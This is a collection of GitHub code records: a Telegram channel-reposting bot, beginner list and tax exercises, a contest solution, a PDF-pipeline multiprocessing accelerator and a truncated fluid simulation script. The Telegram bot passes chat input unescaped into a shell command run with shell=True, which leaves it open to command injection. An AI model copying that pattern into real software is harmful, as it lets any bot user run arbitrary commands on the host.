+{"seq_id":"5575735087","text":"import telebot \nimport json \nimport subprocess\n\nTOKEN = \".................\"\nbot = telebot.TeleBot(TOKEN)\n\ndef collect_posts(channel):\n with open(f\"{channel}.txt\") as file:\n file = file.readlines()\n posts = []\n for n, line in enumerate(file):\n file[n] = json.loads(file[n])\n links = [link for link in file[n]['outlinks'] if channel not in link]\n p = str(file[n]['content']) + \"\\n\\n\" + str(\"\\n\".join(links))\n posts.append(p)\n return posts \n\n\ndef upload_posts(num_posts, channel):\n command = f'snscrape --max-result {num_posts} --jsonl telegram-channel {channel} > {channel}.txt'\n subprocess.run(command, shell=True)\n\n\n@bot.message_handler(commands=['start'])\ndef send_welcome(message):\n bot.reply_to(message, \"Напиши:\\n1. название канала, откуда выгрузить\\n2. сколько последних постов выгрузить\\n3. куда выгрузить\\n\\nПример ввода:\\n `other_channel 10 my_channel` \") \n\n\n@bot.message_handler(content_types=[\"text\"])\ndef send_welcome(message):\n try:\n channel, num_posts, target_channel = str(message.text).split()\n target_channel = \"@\"+target_channel\n \n upload_posts(num_posts, channel)\n posts = collect_posts(channel)\n while posts:\n bot.send_message(target_channel, posts.pop())\n \n bot.reply_to(message, \"Отлично, пересылка завершена\")\n\n except:\n bot.reply_to(message, \"Неправильный формат. Нажми /start, чтобы увидеть правильный формат ввода\")\n\n\nif __name__ == \"__main__\":\n bot.polling() \n","repo_name":"Develp10/chatgpttelegram","sub_path":"0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"32708430849","text":"'''\r\nCreated on 30 nov. 2016\r\n\r\n@author: Manuel\r\n'''\r\ndef crear_lista(lista):\r\n '''\r\n Funcion para crear una lista con 5 variables a partir de una lista vacia que utilizaremos posteriormente.\r\n Por favor, introduzca solo 5 variables porque sino lo demas no funciona.\r\n '''\r\n objeto=input(\"Introduzca un elemento a la cadena:\")\r\n lista.append(objeto)\r\n pregunta=input(\"Quieres meter mas elementos?\") #Introduzca si o no\r\n while pregunta==\"Si\" or pregunta==\"si\":\r\n elemento=input(\"Introduzca otro elemento:\")\r\n lista.append(elemento)\r\n print(lista)\r\n pregunta=input(\"Quieres meter mas elementos?\")\r\n return lista\r\ndef dividir_lista(lista):\r\n ''' \r\n A continuacion vamos a dividir la lista en pacientes, fase en la que se encuentra y temperaturas.\r\n '''\r\n id_paciente=lista[0]\r\n fase=lista[1]\r\n temperaturas=lista[2:]\r\n return id_paciente,fase,temperaturas\r\ndef anadir_temperatura(temperaturas1):\r\n '''\r\n Esta funcion se utiliza para anadir una temperatura a la lista de temperaturas.\r\n '''\r\n elemento6=float(input(\"Introduce un valor nuevo de temperaturas:\"))\r\n temperaturas1.append(elemento6)\r\n return temperaturas1\r\ndef flotante(temperaturafinal):\r\n '''\r\n Esta funcion se utiliza para cambiar las temperaturas a flotantes.\r\n '''\r\n temperaturafinal[0]=float(temperaturafinal[0])\r\n temperaturafinal[1]=float(temperaturafinal[1])\r\n temperaturafinal[2]=float(temperaturafinal[2])\r\n return temperaturafinal\r\ndef lista_temp2(temperaturafinalfloat):\r\n '''\r\n Esta funcion crea una lista de temperaturas para anadirla despues a las temperaturas.\r\n '''\r\n tmp=[]\r\n pregunta=input(\"Quiere crear una lista nueva de temperaturas para anadirla a la anterior?\") #Introduzca si o no\r\n while pregunta==\"Si\" or pregunta==\"si\":\r\n elemento=float(input(\"Introduzca otro elemento:\"))\r\n tmp.append(elemento)\r\n pregunta=input(\"Quieres meter mas elementos?\")\r\n return tmp \r\ndef temperaturas_finales(temperaturafinalfloat):\r\n '''\r\n Esta funcion anade la lista tmp a las temperaturas.\r\n '''\r\n temperaturafinalfloat.append(tmp)\r\n return temperaturafinalfloat\r\ndef contar_elementos(lastemperaturas):\r\n '''\r\n Esta funcion cuenta los elementos en temperaturas.\r\n '''\r\n l=len(tmp)+len(temperaturafinalfloat)\r\n bueno=l-1\r\n return bueno\r\ndef cadena_texto(lastemperaturas):\r\n '''\r\n Esta funcion pasa las temperaturas a cadena de texto.\r\n '''\r\n for x in range(len(lastemperaturas)):\r\n lastemperaturas[x]=str(lastemperaturas[x])\r\n elemento=lastemperaturas[0]\r\n for x in range(len(lastemperaturas)):\r\n elemento=elemento+\", \"+lastemperaturas[x]\r\n temperaturas_cadena=elemento\r\n return temperaturas_cadena\r\nif __name__==\"__main__\":\r\n lista=[]\r\n print(crear_lista(lista))\r\n id_paciente,fase,temperaturas1=dividir_lista(lista)\r\n temperaturafinal=anadir_temperatura(temperaturas1)\r\n temperaturafinalfloat=flotante(temperaturafinal)\r\n tmp=lista_temp2(temperaturafinalfloat)\r\n lastemperaturas=temperaturas_finales(temperaturafinalfloat)\r\n elementos_temperaturas=contar_elementos(temperaturafinalfloat)\r\n temperaturastexto=cadena_texto(lastemperaturas)\r\n\r\n ","repo_name":"manolosierra99/EJERCICIOS_LISTAS","sub_path":"Ejercicios_Listas/Funciones_listas/Funcion_lista.py","file_name":"Funcion_lista.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"13689896821","text":"subtotal = input(\"What is the order amount? \")\nprint(subtotal)\nsubtotal = float(subtotal)\n\nf_subtotal = '{:20,.2f}'.format(subtotal)\nf_subtotal = str(f_subtotal)\nprint(\"subtotal: \" + f_subtotal)\nstate = raw_input(\"What is the state? \")\nif (state == \"MD\"):\n print(\"subtotal: \" + f_subtotal)\n taxrate = float(0.06)\n tax = taxrate * subtotal\n tax = float(tax)\n f_tax = ('{:20,.2f}'.format(tax))\n f_tax = str(f_tax)\n print(\"Sales Tax: \" + f_tax)\n total = tax + subtotal\n f_Total = ('{:20,.2f}'.format(total))\n f_Total = str(f_Total)\n print(\"Total: \" + f_Total)\nelse:\n print(\"Don't know where that is.\")\n","repo_name":"Ocho262/Python_Challenges_2","sub_path":"tax_calculator.py","file_name":"tax_calculator.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"34140845082","text":"\"\"\"\n94% solution that works by finding leafs with negative profit and cutting them off. The process of\npruning leafs is repeated until no more leafs can be removed. It currently falls short of AC(100)\nbecause individual nodes only know about their direct dependants, and they'd need to know about\n*all* dependants to accuratly calculate their own profit. Naïvely implementing this resulted in a \nrunning time greater than the one second limit imposed by the challenge.\n\"\"\"\n\nimport sys\nimport abc\nfrom collections import deque\nfrom functools import reduce\nfrom typing import Set, Optional\n\n\nclass Element(abc.ABC):\n __slots__ = \"excavated\", \"x\", \"y\"\n\n excavated: bool\n x: int\n y: int\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.excavated = False\n\n @abc.abstractmethod\n def text():\n return\n\n @abc.abstractmethod\n def excavate():\n return\n\n\nclass Dirt(Element):\n def text(self):\n return \" \" if self.excavated else \"#\"\n\n def excavate(self):\n self.excavated = True\n\n\nclass Mink(Element):\n __slots__ = \"calls\", \"filler\", \"dependencies\", \"dependants\", \"d\", \"_cost\"\n\n chars = \"<\", \"=\", \">\"\n calls: int\n d: int\n _cost: Optional[int]\n filler: Set[Dirt]\n dependencies: Set[\"Mink\"]\n dependants: Set[\"Mink\"]\n\n def __init__(self, x, y, d):\n super().__init__(x, y)\n self.d = d\n self._cost = None\n self.calls = -1\n self.filler = set()\n self.dependencies = set()\n self.dependants = set()\n\n def text(self):\n if self.excavated:\n return \" \"\n self.calls += 1\n return self.chars[self.calls % len(self.chars)]\n\n def excavate(self):\n self.excavated = True\n for dirt in self.filler:\n dirt.excavate()\n\n def cost(self):\n if self._cost is None:\n self._cost = (\n len(self.filler)\n + reduce(lambda a, m: a + m.cost(), self.dependants, 0)\n - self.d\n )\n return self._cost\n\n def expand(self):\n yield self\n for dependant in self.dependants:\n yield from dependant.expand()\n\n def remove(self, ms):\n self._cost = None\n if not self.dependants.isdisjoint(ms):\n self.dependants -= ms\n\n def __eq__(self, other):\n return isinstance(other, self.__class__) and hash(self) == hash(other)\n\n def __hash__(self):\n return (self.x << 16) + self.y\n\n def __repr__(self):\n return f\"Mink({self.x}, {self.y}, cost={self.cost()})\"\n\n\nclass Cluster:\n __slots__ = \"mink\", \"cost\"\n\n mink: Set[Mink]\n cost: int\n\n def __init__(self, mink: Set[Mink]):\n self.mink = mink\n self.cost = reduce(lambda a, m: a + len(m.filler) - m.d, self.mink, 0)\n\n def excavatable(self):\n return self.cost < 0\n\n def shrink(self):\n yield from self.eliminate(\n set(\n d\n for m in filter(\n lambda m: not any(map(lambda d: d.cost() >= 0, m.dependants))\n and m.cost() >= 0,\n self.mink,\n )\n for d in m.expand()\n )\n )\n\n def eliminate(self, ms):\n mink = self.mink - ms\n for m in mink:\n m.remove(ms)\n yield from make_clusters(mink)\n\n def excavate(self):\n for m in self.mink:\n m.excavate()\n\n def __repr__(self):\n return f\"Cluster({self.mink})\"\n\n def __eq__(self, other):\n return isinstance(other, self.__class__) and self.mink == other.mink\n\n\ndef read_ground():\n h, b, d = map(int, sys.stdin.readline().split())\n mink = set()\n ground = []\n for y in range(h):\n ground.append([])\n for x in range(b):\n read = sys.stdin.read(1)\n if read == \"#\":\n ground[y].append(Dirt(x, y))\n elif read == \"<\":\n m = Mink(x, y, d)\n ground[y].append(m)\n mink.add(m)\n else:\n ground[y].append(ground[y][x - 1])\n sys.stdin.read(1)\n return ground, mink\n\n\ndef set_dependencies(ground, mink):\n for m in mink:\n for offset in range(3):\n for y in range(m.y - 1, -1, -1):\n here = ground[y][m.x + offset]\n if isinstance(here, Mink):\n here.dependants.add(m)\n m.dependencies.add(here)\n break\n else:\n m.filler.add(here)\n\n\ndef make_clusters(mink):\n seen = set()\n\n def connected(m):\n if m not in seen:\n seen.add(m)\n for other in m.dependencies | m.dependants:\n yield from connected(other)\n yield m\n\n for m in mink:\n if m not in seen:\n yield Cluster(set(connected(m)))\n\n\nground, mink = read_ground()\nset_dependencies(ground, mink)\nqueue = deque(make_clusters(mink))\n\nwhile len(queue) != 0:\n cluster = queue.popleft()\n for nc in cluster.shrink():\n if nc == cluster:\n if nc.excavatable():\n nc.excavate()\n else:\n queue.append(nc)\n\nprint(\"\\n\".join(\"\".join(el.text() for el in row) for row in ground))\n","repo_name":"JonasUJ/hoest21","sub_path":"T-itu.mink/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"70859905606","text":"import gc\nimport signal\nfrom multiprocessing.connection import wait\nfrom random import shuffle\nfrom typing import Any, Iterable, List, Optional, Union\n\nimport torch\nimport torch.multiprocessing as mp\n\nfrom .. import TrainablePipe\nfrom ..registry import registry\nfrom ..utils.collections import batchify\nfrom .base import Accelerator, FromDictFieldsToDoc, FromDoc, ToDoc\n\nDEBUG = False\n\ndebug = (\n (lambda *args, flush=False, **kwargs: print(*args, **kwargs, flush=True))\n if DEBUG\n else lambda *args, **kwargs: None\n)\n\n\nclass Exchanger:\n def __init__(\n self,\n num_stages,\n num_gpu_workers,\n num_cpu_workers,\n gpu_worker_devices,\n ):\n # queue for cpu input tasks\n self.gpu_worker_devices = gpu_worker_devices\n # We add prioritized queue at the end for STOP signals\n self.cpu_inputs_queues = [\n [mp.SimpleQueue()] + [mp.SimpleQueue() for _ in range(num_stages + 1)]\n # The input queue is not shared between processes, since calling `wait`\n # on a queue reader from multiple processes may lead to a deadlock\n for _ in range(num_cpu_workers)\n ]\n self.gpu_inputs_queues = [\n [mp.SimpleQueue() for _ in range(num_stages + 1)]\n for _ in range(num_gpu_workers)\n ]\n self.outputs_queue = mp.Queue()\n\n def get_cpu_tasks(self, idx):\n while True:\n queue_readers = wait(\n [queue._reader for queue in self.cpu_inputs_queues[idx]]\n )\n stage, queue = next(\n (stage, q)\n for stage, q in reversed(list(enumerate(self.cpu_inputs_queues[idx])))\n if q._reader in queue_readers\n )\n try:\n item = queue.get()\n except BaseException:\n continue\n if item is None:\n return\n yield stage, item\n\n def put_cpu(self, item, stage, idx):\n return self.cpu_inputs_queues[idx][stage].put(item)\n\n def get_gpu_tasks(self, idx):\n while True:\n queue_readers = wait(\n [queue._reader for queue in self.gpu_inputs_queues[idx]]\n )\n stage, queue = next(\n (stage, q)\n for stage, q in reversed(list(enumerate(self.gpu_inputs_queues[idx])))\n if q._reader in queue_readers\n )\n try:\n item = queue.get()\n except BaseException: # pragma: no cover\n continue\n if item is None:\n return\n yield stage, item\n\n def put_gpu(self, item, stage, idx):\n return self.gpu_inputs_queues[idx][stage].put(item)\n\n def put_results(self, items):\n self.outputs_queue.put(items)\n\n def iter_results(self):\n for out in iter(self.outputs_queue.get, None):\n yield out\n\n\nclass CPUWorker(mp.Process):\n def __init__(\n self,\n cpu_idx: int,\n exchanger: Exchanger,\n gpu_pipe_names: List[str],\n model: Any,\n device: Union[str, torch.device],\n ):\n super(CPUWorker, self).__init__()\n\n self.cpu_idx = cpu_idx\n self.exchanger = exchanger\n self.gpu_pipe_names = gpu_pipe_names\n self.model = model\n self.device = device\n\n def _run(self):\n # Cannot pass torch tensor during init i think ? otherwise i get\n # ValueError: bad value(s) in fds_to_keep\n mp._prctl_pr_set_pdeathsig(signal.SIGINT)\n\n model = self.model.to(self.device)\n stages = [{\"cpu_components\": [], \"gpu_component\": None}]\n for name, component in model.pipeline:\n if name in self.gpu_pipe_names:\n stages[-1][\"gpu_component\"] = component\n stages.append({\"cpu_components\": [], \"gpu_component\": None})\n else:\n stages[-1][\"cpu_components\"].append(component)\n\n next_batch_id = 0\n active_batches = {}\n debug(\n f\"CPU worker {self.cpu_idx} is ready\",\n next(model.parameters()).device,\n flush=True,\n )\n\n had_error = False\n with torch.no_grad():\n for stage, task in self.exchanger.get_cpu_tasks(self.cpu_idx):\n if had_error:\n continue # pragma: no cover\n try:\n if stage == 0:\n gpu_idx = None\n batch_id = next_batch_id\n debug(\"preprocess start for\", batch_id)\n next_batch_id += 1\n docs = task\n else:\n gpu_idx, batch_id, result = task\n debug(\"postprocess start for\", batch_id)\n docs = active_batches.pop(batch_id)\n gpu_pipe = stages[stage - 1][\"gpu_component\"]\n docs = gpu_pipe.postprocess(docs, result) # type: ignore\n\n for component in stages[stage][\"cpu_components\"]:\n if hasattr(component, \"batch_process\"):\n docs = component.batch_process(docs)\n else:\n docs = [component(doc) for doc in docs]\n\n gpu_pipe = stages[stage][\"gpu_component\"]\n if gpu_pipe is not None:\n preprocessed = gpu_pipe.make_batch(docs) # type: ignore\n active_batches[batch_id] = docs\n if gpu_idx is None:\n gpu_idx = batch_id % len(self.exchanger.gpu_worker_devices)\n collated = gpu_pipe.collate( # type: ignore\n preprocessed,\n device=self.exchanger.gpu_worker_devices[gpu_idx],\n )\n self.exchanger.put_gpu(\n item=(self.cpu_idx, batch_id, collated),\n idx=gpu_idx,\n stage=stage,\n )\n batch_id += 1\n debug(\"preprocess end for\", batch_id)\n else:\n self.exchanger.put_results((docs, self.cpu_idx, gpu_idx))\n debug(\"postprocess end for\", batch_id)\n except BaseException as e:\n had_error = True\n import traceback\n\n print(traceback.format_exc(), flush=True)\n self.exchanger.put_results((e, self.cpu_idx, None))\n # We need to drain the queues of GPUWorker fed inputs (pre-moved to GPU)\n # to ensure no tensor allocated on producer processes (CPUWorker via\n # collate) are left in consumer processes\n debug(\"Start draining CPU worker\", self.cpu_idx)\n [None for _ in self.exchanger.get_cpu_tasks(self.cpu_idx)]\n debug(f\"CPU worker {self.cpu_idx} is about to stop\")\n\n def run(self):\n self._run()\n self.model = None\n gc.collect()\n torch.cuda.empty_cache()\n\n\nclass GPUWorker(mp.Process):\n def __init__(\n self,\n gpu_idx,\n exchanger: Exchanger,\n gpu_pipe_names: List[str],\n model: Any,\n device: Union[str, torch.device],\n ):\n super().__init__()\n\n self.device = device\n self.gpu_idx = gpu_idx\n self.exchanger = exchanger\n\n self.gpu_pipe_names = gpu_pipe_names\n self.model = model\n self.device = device\n\n def _run(self):\n debug(\"GPU worker\", self.gpu_idx, \"started\")\n mp._prctl_pr_set_pdeathsig(signal.SIGINT)\n had_error = False\n\n model = self.model.to(self.device)\n stage_components = [model.get_pipe(name) for name in self.gpu_pipe_names]\n del model\n with torch.no_grad():\n for stage, task in self.exchanger.get_gpu_tasks(self.gpu_idx):\n if had_error:\n continue # pragma: no cover\n try:\n cpu_idx, batch_id, batch = task\n debug(\"forward start for\", batch_id)\n component = stage_components[stage]\n res = component.module_forward(batch)\n del batch, task\n # TODO set non_blocking=True here\n res = {\n key: val.to(\"cpu\") if not isinstance(val, int) else val\n for key, val in res.items()\n }\n self.exchanger.put_cpu(\n item=(self.gpu_idx, batch_id, res),\n stage=stage + 1,\n idx=cpu_idx,\n )\n debug(\"forward end for\", batch_id)\n except BaseException as e:\n had_error = True\n self.exchanger.put_results((e, None, self.gpu_idx))\n import traceback\n\n print(traceback.format_exc(), flush=True)\n task = batch = res = None # noqa\n # We need to drain the queues of CPUWorker fed inputs (pre-moved to GPU)\n # to ensure no tensor allocated on producer processes (CPUWorker via\n # collate) are left in consumer processes\n debug(\"Start draining GPU worker\", self.gpu_idx)\n [None for _ in self.exchanger.get_gpu_tasks(self.gpu_idx)]\n debug(f\"GPU worker {self.gpu_idx} is about to stop\")\n\n def run(self):\n self._run()\n self.model = None\n gc.collect()\n torch.cuda.empty_cache()\n\n\nDEFAULT_MAX_CPU_WORKERS = 4\n\n\n@registry.accelerator.register(\"multiprocessing\")\nclass MultiprocessingAccelerator(Accelerator):\n \"\"\"\n If you have multiple CPU cores, and optionally multiple GPUs, we provide a\n `multiprocessing` accelerator that allows to run the inference on multiple\n processes.\n\n This accelerator dispatches the batches between multiple workers\n (data-parallelism), and distribute the computation of a given batch on one or two\n workers (model-parallelism). This is done by creating two types of workers:\n\n - a `CPUWorker` which handles the non deep-learning components and the\n preprocessing, collating and postprocessing of deep-learning components\n - a `GPUWorker` which handles the forward call of the deep-learning components\n\n The advantage of dedicating a worker to the deep-learning components is that it\n allows to prepare multiple batches in parallel in multiple `CPUWorker`, and ensure\n that the `GPUWorker` never wait for a batch to be ready.\n\n The overall architecture described in the following figure, for 3 CPU workers and 2\n GPU workers.\n\n
\n \n
\n\n Here is how a small pipeline with rule-based components and deep-learning components\n is distributed between the workers:\n\n
\n \n
\n\n Examples\n --------\n\n ```python\n docs = list(\n pipeline.pipe(\n [content1, content2, ...],\n accelerator={\n \"@accelerator\": \"multiprocessing\",\n \"num_cpu_workers\": 3,\n \"num_gpu_workers\": 2,\n \"batch_size\": 8,\n },\n )\n )\n ```\n\n Parameters\n ----------\n batch_size: int\n Number of documents to process at a time in a CPU/GPU worker\n num_cpu_workers: int\n Number of CPU workers. A CPU worker handles the non deep-learning components\n and the preprocessing, collating and postprocessing of deep-learning components.\n num_gpu_workers: Optional[int]\n Number of GPU workers. A GPU worker handles the forward call of the\n deep-learning components.\n gpu_pipe_names: Optional[List[str]]\n List of pipe names to accelerate on a GPUWorker, defaults to all pipes\n that inherit from TrainablePipe\n \"\"\"\n\n def __init__(\n self,\n batch_size: int,\n num_cpu_workers: Optional[int] = None,\n num_gpu_workers: Optional[int] = None,\n gpu_pipe_names: Optional[List[str]] = None,\n gpu_worker_devices: Optional[List[Union[torch.device, str]]] = None,\n cpu_worker_devices: Optional[List[Union[torch.device, str]]] = None,\n ):\n self.batch_size = batch_size\n self.num_gpu_workers: Optional[int] = num_gpu_workers\n self.num_cpu_workers = num_cpu_workers\n self.gpu_pipe_names = gpu_pipe_names\n self.gpu_worker_devices = gpu_worker_devices\n self.cpu_worker_devices = cpu_worker_devices\n\n def __call__(\n self,\n inputs: Iterable[Any],\n model: Any,\n to_doc: ToDoc = FromDictFieldsToDoc(\"content\"),\n from_doc: FromDoc = lambda doc: doc,\n ):\n \"\"\"\n Stream of documents to process. Each document can be a string or a tuple\n\n Parameters\n ----------\n inputs\n model\n\n Yields\n ------\n Any\n Processed outputs of the pipeline\n \"\"\"\n if torch.multiprocessing.get_start_method() != \"spawn\":\n torch.multiprocessing.set_start_method(\"spawn\", force=True)\n\n gpu_pipe_names = (\n [\n name\n for name, component in model.pipeline\n if isinstance(component, TrainablePipe)\n ]\n if self.gpu_pipe_names is None\n else self.gpu_pipe_names\n )\n\n if not all(model.has_pipe(name) for name in gpu_pipe_names):\n raise ValueError(\n \"GPU accelerated pipes {} could not be found in the model\".format(\n sorted(set(model.pipe_names) - set(gpu_pipe_names))\n )\n )\n\n num_devices = torch.cuda.device_count()\n print(f\"Number of available devices: {num_devices}\", flush=True)\n\n num_cpu_workers = self.num_cpu_workers\n num_gpu_workers = self.num_gpu_workers\n\n if num_gpu_workers is None:\n num_gpu_workers = num_devices if len(gpu_pipe_names) > 0 else 0\n\n if num_cpu_workers is None:\n num_cpu_workers = max(\n min(mp.cpu_count() - num_gpu_workers, DEFAULT_MAX_CPU_WORKERS), 0\n )\n\n if num_gpu_workers == 0:\n gpu_pipe_names = []\n\n gpu_worker_devices = (\n [\n torch.device(f\"cuda:{gpu_idx * num_devices // num_gpu_workers}\")\n for gpu_idx in range(num_gpu_workers)\n ]\n if self.gpu_worker_devices is None\n else self.gpu_worker_devices\n )\n cpu_worker_devices = (\n [\"cpu\"] * num_cpu_workers\n if self.cpu_worker_devices is None\n else self.cpu_worker_devices\n )\n assert len(cpu_worker_devices) == num_cpu_workers\n assert len(gpu_worker_devices) == num_gpu_workers\n if num_cpu_workers == 0:\n (\n num_cpu_workers,\n num_gpu_workers,\n cpu_worker_devices,\n gpu_worker_devices,\n gpu_pipe_names,\n ) = (num_gpu_workers, 0, gpu_worker_devices, [], [])\n\n debug(f\"Number of CPU workers: {num_cpu_workers}\")\n debug(f\"Number of GPU workers: {num_gpu_workers}\")\n\n exchanger = Exchanger(\n num_stages=len(gpu_pipe_names),\n num_cpu_workers=num_cpu_workers,\n num_gpu_workers=num_gpu_workers,\n gpu_worker_devices=gpu_worker_devices,\n )\n\n cpu_workers = []\n gpu_workers = []\n model = model.to(\"cpu\")\n\n for gpu_idx in range(num_gpu_workers):\n gpu_workers.append(\n GPUWorker(\n gpu_idx=gpu_idx,\n exchanger=exchanger,\n gpu_pipe_names=gpu_pipe_names,\n model=model,\n device=gpu_worker_devices[gpu_idx],\n )\n )\n\n for cpu_idx in range(num_cpu_workers):\n cpu_workers.append(\n CPUWorker(\n cpu_idx=cpu_idx,\n exchanger=exchanger,\n gpu_pipe_names=gpu_pipe_names,\n model=model,\n device=cpu_worker_devices[cpu_idx],\n )\n )\n\n for worker in (*cpu_workers, *gpu_workers):\n worker.start()\n\n try:\n num_max_enqueued = num_cpu_workers * 2 + 10\n # Number of input/output batch per process\n total_inputs = [0] * num_cpu_workers\n total_outputs = [0] * num_cpu_workers\n outputs_iterator = exchanger.iter_results()\n\n cpu_worker_indices = list(range(num_cpu_workers))\n inputs_iterator = (to_doc(i) for i in inputs)\n for i, pdfs_batch in enumerate(batchify(inputs_iterator, self.batch_size)):\n if sum(total_inputs) - sum(total_outputs) >= num_max_enqueued:\n outputs, cpu_idx, gpu_idx = next(outputs_iterator)\n if isinstance(outputs, BaseException):\n raise outputs # pragma: no cover\n yield from (from_doc(o) for o in outputs)\n total_outputs[cpu_idx] += 1\n\n # Shuffle to ensure the first process does not receive all the documents\n # in case of total_inputs - total_outputs equality\n shuffle(cpu_worker_indices)\n cpu_idx = min(\n cpu_worker_indices,\n key=lambda i: total_inputs[i] - total_outputs[i],\n )\n exchanger.put_cpu(pdfs_batch, stage=0, idx=cpu_idx)\n total_inputs[cpu_idx] += 1\n\n while sum(total_outputs) < sum(total_inputs):\n outputs, cpu_idx, gpu_idx = next(outputs_iterator)\n if isinstance(outputs, BaseException):\n raise outputs # pragma: no cover\n yield from (from_doc(o) for o in outputs)\n total_outputs[cpu_idx] += 1\n finally:\n # Send gpu and cpu process the order to stop processing data\n # We use the prioritized queue to ensure the stop signal is processed\n # before the next batch of data\n for i, worker in enumerate(gpu_workers):\n exchanger.gpu_inputs_queues[i][-1].put(None)\n debug(\"Asked gpu worker\", i, \"to stop processing data\")\n for i, worker in enumerate(cpu_workers):\n exchanger.cpu_inputs_queues[i][-1].put(None)\n debug(\"Asked cpu worker\", i, \"to stop processing data\")\n\n # Enqueue a final non prioritized STOP signal to ensure there remains no\n # data in the queues (cf drain loop in CPUWorker / GPUWorker)\n for i, worker in enumerate(gpu_workers):\n exchanger.gpu_inputs_queues[i][0].put(None)\n debug(\"Asked gpu\", i, \"to end\")\n for i, worker in enumerate(gpu_workers):\n worker.join(timeout=5)\n debug(\"Joined gpu worker\", i)\n for i, worker in enumerate(cpu_workers):\n exchanger.cpu_inputs_queues[i][0].put(None)\n debug(\"Asked cpu\", i, \"to end\")\n for i, worker in enumerate(cpu_workers):\n worker.join(timeout=1)\n debug(\"Joined cpu worker\", i)\n\n # If a worker is still alive, kill it\n # This should not happen, but for a reason I cannot explain, it does in\n # some CPU workers sometimes when we catch an error, even though each run\n # method of the workers completes cleanly. Maybe this has something to do\n # with the cleanup of these processes ?\n for i, worker in enumerate(gpu_workers): # pragma: no cover\n if worker.is_alive():\n print(\"Killing gpu worker\", i)\n worker.kill()\n for i, worker in enumerate(cpu_workers): # pragma: no cover\n if worker.is_alive():\n print(\"Killing cpu worker\", i)\n worker.kill()\n","repo_name":"aphp/edspdf","sub_path":"edspdf/accelerators/multiprocessing.py","file_name":"multiprocessing.py","file_ext":"py","file_size_in_byte":20408,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"99"} +{"seq_id":"31174746224","text":"import sys\nimport numpy \nfrom pyranda import pyrandaSim, pyrandaBC, pyrandaTimestep, pyrandaIBM\n\n\n\n## Define a mesh\nNpts = 64\nL = numpy.pi * 2.0 \ndim = 2\ngamma = 1.4\n\nproblem = 'cylinder'\n\nLp = L * (Npts-1.0) / Npts\n\nsys.path.append('../')\nfrom meshTest import zoomMesh_solve\ndxf = 4*Lp / float(Npts) * .3\nxS = zoomMesh_solve(Npts,-2.*Lp,2.*Lp,-2.,2.,1.0,dxf)\n\ndef zoomMesh(i,j,k):\n x = xS[i]\n y = xS[j]\n z = 0.0\n return x,y,z\n\nmesh_options = {}\nmesh_options['coordsys'] = 3\nmesh_options['function'] = zoomMesh\nmesh_options['periodic'] = numpy.array([False, False, True])\nmesh_options['gridPeriodic'] = numpy.array([False, False, False])\nmesh_options['dim'] = 3\nmesh_options['x1'] = [ -2*Lp , -2*Lp , 0.0 ]\nmesh_options['xn'] = [ 2*Lp , 2*Lp , Lp ]\nmesh_options['nn'] = [ Npts, Npts , 1 ]\n\n\n# Initialize a simulation object on a mesh\nss = pyrandaSim(problem,mesh_options)\nss.addPackage( pyrandaBC(ss) )\nss.addPackage( pyrandaIBM(ss) )\nss.addPackage( pyrandaTimestep(ss) )\n\n\nrho0 = 1.0\np0 = 1.0\ngamma = 1.4\nmach = 2.0\ns0 = numpy.sqrt( p0 / rho0 * gamma )\nu0 = s0 * mach\ne0 = p0/(gamma-1.0) + rho0*.5*u0*u0\n\n\n# Define the equations of motion\neom =\"\"\"\n# Primary Equations of motion here\nddt(:rho:) = -div(:rho:*:u:, :rho:*:v:)\nddt(:rhou:) = -div(:rhou:*:u: + :p: - :tau:, :rhou:*:v:)\nddt(:rhov:) = -div(:rhov:*:u:, :rhov:*:v: + :p: - :tau:)\nddt(:Et:) = -div( (:Et: + :p: - :tau:)*:u: - :tx:*:kappa:, (:Et: + :p: - :tau:)*:v: - :ty:*:kappa: )\n# Level set equation\n#ddt(:phi:) = - :gx: * :u1: - :gy: * :v1: \n# Conservative filter of the EoM\n:rho: = fbar( :rho: )\n:rhou: = fbar( :rhou: )\n:rhov: = fbar( :rhov: )\n:Et: = fbar( :Et: )\n# Update the primatives and enforce the EOS\n:u: = :rhou: / :rho:\n:v: = :rhov: / :rho:\n:p: = ( :Et: - .5*:rho:*(:u:*:u: + :v:*:v:) ) * ( :gamma: - 1.0 )\n:T: = :p: / (:rho: * :R: )\n# Artificial bulk viscosity (old school way)\n:div: = div(:u:,:v:)\n:beta: = gbar( ring(:div:) * :rho: ) * 7.0e-3\n:tau: = :beta: * :div: \n[:tx:,:ty:,:tz:] = grad(:T:)\n:kappa: = gbar( ring(:T:)* :rho:*:cv:/(:T: * :dt: ) ) * 1.0e-3\n# Apply BCs and internal IBM\n[:u:,:v:,:w:] = ibmV( [:u:,:v:,0.0], :phi:, [:gx:,:gy:,:gz:], [:u1:,:u2:,0.0] )\n:rho: = ibmS( :rho: , :phi:, [:gx:,:gy:,:gz:] )\n:p: = ibmS( :p: , :phi:, [:gx:,:gy:,:gz:] )\nbc.extrap(['rho','p','u'],['xn'])\nbc.const(['u'],['x1','y1','yn'],u0)\nbc.const(['v'],['x1','xn','y1','yn'],0.0)\nbc.const(['rho'],['x1','y1','yn'],rho0)\nbc.const(['p'],['x1','y1','yn'],p0)\n:Et: = :p: / ( :gamma: - 1.0 ) + .5*:rho:*(:u:*:u: + :v:*:v:)\n:rhou: = :rho:*:u:\n:rhov: = :rho:*:v:\n:cs: = sqrt( :p: / :rho: * :gamma: )\n:dt: = dt.courant(:u:,:v:,:w:,:cs:)\n:dtB: = 0.2* dt.diff(:beta:,:rho:)\n:dt: = numpy.minimum(:dt:,:dtB:)\n:umag: = sqrt( :u:*:u: + :v:*:v: )\n\"\"\"\neom = eom.replace('u0',str(u0)).replace('p0',str(p0)).replace('rho0',str(rho0))\n\n\n# Add the EOM to the solver\nss.EOM(eom)\n\n\n# Initialize variables\nic = \"\"\"\n:gamma: = 1.4\n:R: = 1.0\n:cp: = :R: / (1.0 - 1.0/:gamma: )\n:cv: = :cp: - 